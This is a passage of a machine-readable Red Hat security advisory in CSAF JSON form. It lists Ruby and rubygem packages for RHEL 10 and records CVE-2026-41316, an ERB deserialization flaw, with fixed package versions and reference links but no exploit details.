"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rake-0:13.1.0-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch"
},
"product_reference": "rubygem-rake-0:13.1.0-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch"
},
"product_reference": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rexml-0:3.4.4-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch"
},
"product_reference": "rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rss-0:0.3.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch"
},
"product_reference": "rubygem-rss-0:0.3.1-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch"
},
"product_reference": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch"
},
"product_reference": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-0:3.5.22-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch"
},
"product_reference": "rubygems-0:3.5.22-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-devel-0:3.5.22-12.el10_1.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch"
},
"product_reference": "rubygems-devel-0:3.5.22-12.el10_1.noarch",
"relates_to_product_reference": "CRB-10.1.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41316",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-04-24T03:01:16.620515+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461369"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ERB, a templating system for Ruby. An attacker who can trigger deserialization of untrusted data in a Ruby application can bypass existing protections. This vulnerability allows for arbitrary code execution by exploiting specific public methods that evaluate template source code, which were not properly guarded against deserialization attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "erb: ERB: Arbitrary code execution via deserialization bypass",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.src",
"AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"AppStream-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"AppStream-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"AppStream-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch",
"AppStream-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.src",
"CRB-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"CRB-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"CRB-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"CRB-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-rss-0:0.3.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"CRB-10.1.Z:rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"CRB-10.1.Z:rubygems-0:3.5.22-12.el10_1.noarch",
"CRB-10.1.Z:rubygems-devel-0:3.5.22-12.el10_1.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-41316"
},
{
"category": "external",
"summary": "RHBZ#2461369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-41316",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41316"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316"
},
{
"category": "external",
"summary": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv",
"url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
}
],
"release_date": "2026-04-24T02:35:41.160000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-18T12:50:43+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
